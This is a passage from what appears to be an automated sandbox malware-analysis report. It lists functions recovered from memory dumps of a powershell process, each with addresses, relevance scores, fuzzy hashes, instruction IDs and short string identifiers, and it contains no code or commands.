                                                                                                                                                • Opcode Fuzzy Hash: ee1742c607b03f50333e6991072d94a919327503e3c8533165401ccfdbcdca40
                                                                                                                                                • Instruction Fuzzy Hash: 35B14170E00209DFDF14CFA9C8857EEBBF2EF88318F149529E415AB254EB75A855CB81
                                                                                                                                                Function 04EAF6C0 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4c849ab9f47ea37dce7585aeac4e35dcdb0e22529e4f164d821032e7cb4ac458
                                                                                                                                                • Instruction ID: 609fc89faff3d34aede55daaedca521492602aa31327193618a44c3341680ed8
                                                                                                                                                • Opcode Fuzzy Hash: 4c849ab9f47ea37dce7585aeac4e35dcdb0e22529e4f164d821032e7cb4ac458
                                                                                                                                                • Instruction Fuzzy Hash: EFB16D70E00209DFDF14CFA9D8857ADBBF2AF88318F149529E415EB294EB74B851CB81
                                                                                                                                                Function 07C12BD0 Relevance: 20.6, Strings: 16, Instructions: 618COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$84"l$84"l$tPtq$tPtq$$tq$$tq$$tq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-1363481415
                                                                                                                                                • Opcode ID: 71837593a5ede4273dba041b7cabb8d04f8e92968f371eb031c24196f287a230
                                                                                                                                                • Instruction ID: e569388e8b546af754109c983ee551aaeac05ca56e29e03a550a749e95970ca7
                                                                                                                                                • Opcode Fuzzy Hash: 71837593a5ede4273dba041b7cabb8d04f8e92968f371eb031c24196f287a230
                                                                                                                                                • Instruction Fuzzy Hash: 8B223AB5708286DFCB259B29C89166ABBF1BF83214F24C0BBD845CF252DB35C941D7A1
                                                                                                                                                Function 07C18613 Relevance: 20.5, Strings: 16, Instructions: 537COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$4'tq$4'tq$tPtq$tPtq$$tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-3226822312
                                                                                                                                                • Opcode ID: b6922e4b85b6d2cf7c55f30a59114750b87e61ffe59b670319e680a48b514221
                                                                                                                                                • Instruction ID: 3f010be59660d23683dd948c3783f9813cdeec2845955f9571893fb1d6becae9
                                                                                                                                                • Opcode Fuzzy Hash: b6922e4b85b6d2cf7c55f30a59114750b87e61ffe59b670319e680a48b514221
                                                                                                                                                • Instruction Fuzzy Hash: C2023CF1B0C21ADFDB258B79889166ABBE2AF87330F14C0BAD9118F251DB35C941D791
                                                                                                                                                Function 07C14FB0 Relevance: 18.7, Strings: 14, Instructions: 1243COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l$(f$l$(f$l$(f$l$(f$l$(f$l$(f$l$4'tq$4'tq$4'tq$4'tq$tPtq$tPtq
                                                                                                                                                • API String ID: 0-3113410085
                                                                                                                                                • Opcode ID: bf939bf449f6c8f4da3808c346e6ad007866255cb8393905251f1b4e0ed1beb1
                                                                                                                                                • Instruction ID: d096ee40aaaf36f9cc19d8d504e163be005b028d7dd2daa361d1718fca329eb5
                                                                                                                                                • Opcode Fuzzy Hash: bf939bf449f6c8f4da3808c346e6ad007866255cb8393905251f1b4e0ed1beb1
                                                                                                                                                • Instruction Fuzzy Hash: 00B271B4B00219DFD764CB58C890B6ABBB2BB86304F25C0A9D909AF351DF75DD81CB91
                                                                                                                                                Function 07C177C0 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l$(f$l$(f$l$(f$l$(f$l$(f$l$(f$l
                                                                                                                                                • API String ID: 0-272791228
                                                                                                                                                • Opcode ID: 6f466e8f4fc9c1bc9e59ed74557162ac9c75941dd58906fa27a2d0782db7f66c
                                                                                                                                                • Instruction ID: 39cd7ff976808a6a5499aa8c5626ac883eb6c2c5e6ed3468fb4494d92196e59d
                                                                                                                                                • Opcode Fuzzy Hash: 6f466e8f4fc9c1bc9e59ed74557162ac9c75941dd58906fa27a2d0782db7f66c
                                                                                                                                                • Instruction Fuzzy Hash: 98C192B0A00209DBDB24CB69C491A6BBBB2BF86310F14C57DD8166F744DB36ED42DB91
                                                                                                                                                Function 07C15348 Relevance: 8.3, Strings: 6, Instructions: 760COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l$(f$l$(f$l$(f$l$4'tq
                                                                                                                                                • API String ID: 0-3155944032
                                                                                                                                                • Opcode ID: c8909f2ff80c18e1682ee854a5d96462fb86bc2f2a30c2f34880c15d3fc1d42a
                                                                                                                                                • Instruction ID: c1cf2b67559afcdcca8d7b91502d211c3912add4297c7155d0082fbee15098cc
                                                                                                                                                • Opcode Fuzzy Hash: c8909f2ff80c18e1682ee854a5d96462fb86bc2f2a30c2f34880c15d3fc1d42a
                                                                                                                                                • Instruction Fuzzy Hash: 8B724EB4A00215DFD724CB18C980F6ABBB2BB85304F15C1A9D909AF351DB76ED81CF91
                                                                                                                                                Function 07C17BF8 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq$4'tq
                                                                                                                                                • API String ID: 0-4277026670
                                                                                                                                                • Opcode ID: 111ad205c20e133642ff59a016c80aa8972b2132d6cb3370574b04b777498a8c
                                                                                                                                                • Instruction ID: ffe7250c14b7ff8b3810fed72755dadf40b61114654744681d66b1c24c593b18
                                                                                                                                                • Opcode Fuzzy Hash: 111ad205c20e133642ff59a016c80aa8972b2132d6cb3370574b04b777498a8c
                                                                                                                                                • Instruction Fuzzy Hash: 93D191B4B002099FCB18DB69C451BAEBBB2BF89314F25C469D9016F395CB75DC42CBA1
                                                                                                                                                Function 07C16965 Relevance: 7.8, Strings: 6, Instructions: 312COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq$4'tq
                                                                                                                                                • API String ID: 0-4277026670
                                                                                                                                                • Opcode ID: 8a62105839fdd558d43e4f9c4f4312ac8e6e0a63fcb73c2ce42c2bf50ca08a53
                                                                                                                                                • Instruction ID: ee3eb43cad86fdee965b53e980454782242858a52b3d6e9ff38c808870e39398
                                                                                                                                                • Opcode Fuzzy Hash: 8a62105839fdd558d43e4f9c4f4312ac8e6e0a63fcb73c2ce42c2bf50ca08a53
                                                                                                                                                • Instruction Fuzzy Hash: 1AD160B0A002189FDB14DB68C951B6EBBB2FB85304F1081A9D9096F385DF75DD82CFA1
                                                                                                                                                Function 07C1A5B8 Relevance: 5.6, Strings: 4, Instructions: 578COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$4'tq$4'tq
                                                                                                                                                • API String ID: 0-3196592860
                                                                                                                                                • Opcode ID: a7cded12c777e4df39877ed15e9eb4ddb5c8f6f350c83fe99e2ad8aaf2a1e05b
                                                                                                                                                • Instruction ID: 77ba185fbda81e0940f334deb1b6e28d718cfa19fe1feff83d12f5538155f157
                                                                                                                                                • Opcode Fuzzy Hash: a7cded12c777e4df39877ed15e9eb4ddb5c8f6f350c83fe99e2ad8aaf2a1e05b
                                                                                                                                                • Instruction Fuzzy Hash: 1D1226F17052199FCB258B79C84176EBBA2AFC2310F14C0BAD905CB251EB35CA82D7E1
                                                                                                                                                Function 07C16DEB Relevance: 5.4, Strings: 4, Instructions: 395COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l$4'tq$4'tq
                                                                                                                                                • API String ID: 0-3370351057
                                                                                                                                                • Opcode ID: 3f3893af4aeb5957a2d83d36427b8939291c2ed2cb39f5beb7fca3131ed0240c
                                                                                                                                                • Instruction ID: 6636a29a052f190010458d955ea360acd7eb5968da3c4a7e3bc42f42d0d47eb1
                                                                                                                                                • Opcode Fuzzy Hash: 3f3893af4aeb5957a2d83d36427b8939291c2ed2cb39f5beb7fca3131ed0240c
                                                                                                                                                • Instruction Fuzzy Hash: 75F173B0B002199FDB24DB68C950F6EBBB3BB85300F10C1A9D909AF795DB75DD818B91
                                                                                                                                                Function 07C16368 Relevance: 5.3, Strings: 4, Instructions: 275COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l$(f$l$(f$l
                                                                                                                                                • API String ID: 0-1234685032
                                                                                                                                                • Opcode ID: 8ed6f45aaa3634fc2c773a57065ef4d76a6ce3483f4ca7680dfa4e3fa59f10b2
                                                                                                                                                • Instruction ID: 229fd30ca16215200e8bfd888111a82c3e5f13c8ddc417e02b9a590d08812874
                                                                                                                                                • Opcode Fuzzy Hash: 8ed6f45aaa3634fc2c773a57065ef4d76a6ce3483f4ca7680dfa4e3fa59f10b2
                                                                                                                                                • Instruction Fuzzy Hash: A8B17DF4A00209EFDB18DB69C491B6ABBB2AB89300F14C179D9057F355CF76ED418BA1
                                                                                                                                                Function 07C177A3 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l$(f$l$(f$l
                                                                                                                                                • API String ID: 0-1234685032
                                                                                                                                                • Opcode ID: 5464d9ab5588c113b1fe0a5c335a134dcdba6422f94e312ae97f5e5ca091fe4b
                                                                                                                                                • Instruction ID: 27dac863fe3c74fdc4efe72ba30b736f25fa922c54621a25da5dca39372e3ccb
                                                                                                                                                • Opcode Fuzzy Hash: 5464d9ab5588c113b1fe0a5c335a134dcdba6422f94e312ae97f5e5ca091fe4b
                                                                                                                                                • Instruction Fuzzy Hash: 14A18EB0A00605EBDB24CF54C481A6AFBB2BF8A714F14C57ED8166B704C732E942DF91
                                                                                                                                                Function 07C181D8 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l$(f$l$(f$l
                                                                                                                                                • API String ID: 0-1234685032
                                                                                                                                                • Opcode ID: 2dfb730dfe013963d32462c3910f8e0f04eee40657d5325ae543fb85ad14a1bb
                                                                                                                                                • Instruction ID: f32130582ded1586ac65f6e71bff392a497000c51f63f8e0c8c250cab6ece9ad
                                                                                                                                                • Opcode Fuzzy Hash: 2dfb730dfe013963d32462c3910f8e0f04eee40657d5325ae543fb85ad14a1bb
                                                                                                                                                • Instruction Fuzzy Hash: 2C718EB0A04209DFDB15CB58C495AAEBBF2AF8A320F14C179D814AF354DB35DD41DB91
                                                                                                                                                Function 04EAB700 Relevance: 4.2, Strings: 3, Instructions: 456COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Hxq$$tq$$tq
                                                                                                                                                • API String ID: 0-170547144
                                                                                                                                                • Opcode ID: 83efbec7685c9b6d7878cb59177ec367d2f0c2c961f45ab7488b39148faed1c7
                                                                                                                                                • Instruction ID: 4ca9cf6dfa17ce156b3a62259c5887c92bc2fb1f3bf6ea3212d9369bc2e87665
                                                                                                                                                • Opcode Fuzzy Hash: 83efbec7685c9b6d7878cb59177ec367d2f0c2c961f45ab7488b39148faed1c7
                                                                                                                                                • Instruction Fuzzy Hash: 0F123134B001148FDB25EF64C854AAEBBB6EF89704F1540E9D50AAB351DF35AD86CF80
                                                                                                                                                Function 07C18DA8 Relevance: 4.0, Strings: 3, Instructions: 294COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$$tq
                                                                                                                                                • API String ID: 0-1597867955
                                                                                                                                                • Opcode ID: fae92476c476be484ddc5d8284cf41e83d11f711828f0d5d50235d929ff3f080
                                                                                                                                                • Instruction ID: 8235eefae7aa4d04b6dc6a397947b5b3e1e6d6b302b68dc9249ca7f19181f2df
                                                                                                                                                • Opcode Fuzzy Hash: fae92476c476be484ddc5d8284cf41e83d11f711828f0d5d50235d929ff3f080
                                                                                                                                                • Instruction Fuzzy Hash: 38A138B070C2499FCB258B79C85066ABBE3AF97220F14C0BAD941CF291DB39DD41D7A1
                                                                                                                                                Function 07C17BD8 Relevance: 4.0, Strings: 3, Instructions: 267COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$4'tq
                                                                                                                                                • API String ID: 0-2985750549
                                                                                                                                                • Opcode ID: d9094c0b182cf7f0dc6ac6283669f76b087965b6e4f78dc8fd6fd9d74dd9263b
                                                                                                                                                • Instruction ID: 14b5ec931702e6d947b3fb3c048b48f3f8cfee4cae3e00aa636b8a627f138277
                                                                                                                                                • Opcode Fuzzy Hash: d9094c0b182cf7f0dc6ac6283669f76b087965b6e4f78dc8fd6fd9d74dd9263b
                                                                                                                                                • Instruction Fuzzy Hash: BFB180B4A00209DFDB14DB68C580BAEBBB2BF8A304F25C569D8056F355DB75EC42CB91
                                                                                                                                                Function 07C10A80 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $tq$$tq$$tq
                                                                                                                                                • API String ID: 0-2863945821
                                                                                                                                                • Opcode ID: d4341a737942bf70a7630d483d4fc70919940a627b67dd806c5021e57d065b3d
                                                                                                                                                • Instruction ID: 2f0312baa4d8d8d760ff29804776aaa5110d8bd3f0f2c21b9947ae3feaa5516e
                                                                                                                                                • Opcode Fuzzy Hash: d4341a737942bf70a7630d483d4fc70919940a627b67dd806c5021e57d065b3d
                                                                                                                                                • Instruction Fuzzy Hash: FB412AF6B002199BCB249A69894066EF7A5FFC6214F24813ACC05EB345EB31DAC1D7E1
                                                                                                                                                Function 07C10F48 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $tq$$tq$$tq
                                                                                                                                                • API String ID: 0-2863945821
                                                                                                                                                • Opcode ID: 60c725d9adac597f944318dea20e8cb0c1ddd19b9684edbe62e73b0905e6f42c
                                                                                                                                                • Instruction ID: 84707c4c82324770619a9343d3c122e094a7bb44293866b9b019371cca9bfd56
                                                                                                                                                • Opcode Fuzzy Hash: 60c725d9adac597f944318dea20e8cb0c1ddd19b9684edbe62e73b0905e6f42c
                                                                                                                                                • Instruction Fuzzy Hash: EA217DB171424A6BDF34597E9881B37F7969BC2310F34803AD905DB381DD79C9C19360
                                                                                                                                                Function 07C15F4A Relevance: 3.0, Strings: 2, Instructions: 500COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$4'tq
                                                                                                                                                • API String ID: 0-2537227400
                                                                                                                                                • Opcode ID: 03048715f4d5f4336c963e3991395a644d802ff5e2383a6bd50f16aa2cdad642
                                                                                                                                                • Instruction ID: 25e2c6664106ddccbc1ce7a513e853be8990fdbdea23f9ba4d14df93c652f7b4
                                                                                                                                                • Opcode Fuzzy Hash: 03048715f4d5f4336c963e3991395a644d802ff5e2383a6bd50f16aa2cdad642
                                                                                                                                                • Instruction Fuzzy Hash: E6223DB4A00215DFD724CB18C990F6ABBB2BB85304F25C1A9D909AF351DB76ED81CF91
                                                                                                                                                Function 07C16340 Relevance: 2.8, Strings: 2, Instructions: 256COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l
                                                                                                                                                • API String ID: 0-621886165
                                                                                                                                                • Opcode ID: 3269cf70127e25561c59040b51b7f8a6f869f33d3ca680fe7f3aca41a3245042
                                                                                                                                                • Instruction ID: 5f11c49cbda061d4c6964213f51b242d04835df92a0b04caac694133b5cb7b5c
                                                                                                                                                • Opcode Fuzzy Hash: 3269cf70127e25561c59040b51b7f8a6f869f33d3ca680fe7f3aca41a3245042
                                                                                                                                                • Instruction Fuzzy Hash: 14A18CF4A00205EFDB14DB69C590BAABBB2AF8A304F14C169E901BF355CB75ED41CB61
                                                                                                                                                Function 07C181B4 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l
                                                                                                                                                • API String ID: 0-621886165
                                                                                                                                                • Opcode ID: ddb23e80c583d5a7a5bbe19698942e69fdf2bbc9c3ebb73a4747f9e46e98bf3c
                                                                                                                                                • Instruction ID: 3557a1b5340db8e17d27fa88125ed6660b635b05c906b5b5d3d6d66b6d4358cc
                                                                                                                                                • Opcode Fuzzy Hash: ddb23e80c583d5a7a5bbe19698942e69fdf2bbc9c3ebb73a4747f9e46e98bf3c
                                                                                                                                                • Instruction Fuzzy Hash: B0618FB0A08205DFDB15CF58C494AAAFBF2FF4A320F19C1AAD814AB355C735E941DB91
                                                                                                                                                Function 07C10F2D Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $tq$$tq
                                                                                                                                                • API String ID: 0-1837209516
                                                                                                                                                • Opcode ID: ad6a5e529de87e79d2bfb9d5185929604bb6584f4cc0517946637e609f3c13ea
                                                                                                                                                • Instruction ID: 324a984abfe5c3da11b514c8f50aca860eeec65b9a1be8cb2e52fd585a658fd3
                                                                                                                                                • Opcode Fuzzy Hash: ad6a5e529de87e79d2bfb9d5185929604bb6584f4cc0517946637e609f3c13ea
                                                                                                                                                • Instruction Fuzzy Hash: 97212BB1608385ABDB314A6A4881763BFA55F83350F28407AD9409B386EA7CDAD0D771
                                                                                                                                                Function 07C10A61 Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $tq$$tq
                                                                                                                                                • API String ID: 0-1837209516
                                                                                                                                                • Opcode ID: 528ef21e11f4f5c7b9b74873cb234212cd92587e91c171a699c5034834a08c8f
                                                                                                                                                • Instruction ID: 86337d315347c7c47e3611b6cf3a1289f7a0995aec421ddbcca1a3e34c26c648
                                                                                                                                                • Opcode Fuzzy Hash: 528ef21e11f4f5c7b9b74873cb234212cd92587e91c171a699c5034834a08c8f
                                                                                                                                                • Instruction Fuzzy Hash: 1921C8F6908616DFCB10DF6995803A9FBB4BF56210F198176CC09A7245D33199C0DBA4
                                                                                                                                                Function 04EA89E8 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: W
                                                                                                                                                • API String ID: 0-655174618
                                                                                                                                                • Opcode ID: 982f320597d2e89493e837ce0884730af3aff1a35ae24d9025ee7e5e44162e4e
                                                                                                                                                • Instruction ID: 4b38dd7dfd6518e01eda7792a76e67fc48d21dee0192b9a78779b618458ba059
                                                                                                                                                • Opcode Fuzzy Hash: 982f320597d2e89493e837ce0884730af3aff1a35ae24d9025ee7e5e44162e4e
                                                                                                                                                • Instruction Fuzzy Hash: DD719A34A15204DFCB15EFA8C4849AEBBF2FF89304F1894A9E445AF261DB35ED85CB10
                                                                                                                                                Function 07C18D8A Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq
                                                                                                                                                • API String ID: 0-257826263
                                                                                                                                                • Opcode ID: dea98f0f1358be778006eec60997959be69d0c7486a2919a9380260c12b82e3d
                                                                                                                                                • Instruction ID: e7677fbeb9f65daf357731b5001b00f3f5f5f00c290d87d7b67f797edee2271c
                                                                                                                                                • Opcode Fuzzy Hash: dea98f0f1358be778006eec60997959be69d0c7486a2919a9380260c12b82e3d
                                                                                                                                                • Instruction Fuzzy Hash: 0C41B5F4B0C2029FCB24CF65C580B6AB7E3AF67664F2480B5D9009B255D739DA41D791
                                                                                                                                                Function 04EA2F50 Relevance: .5, Instructions: 515COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
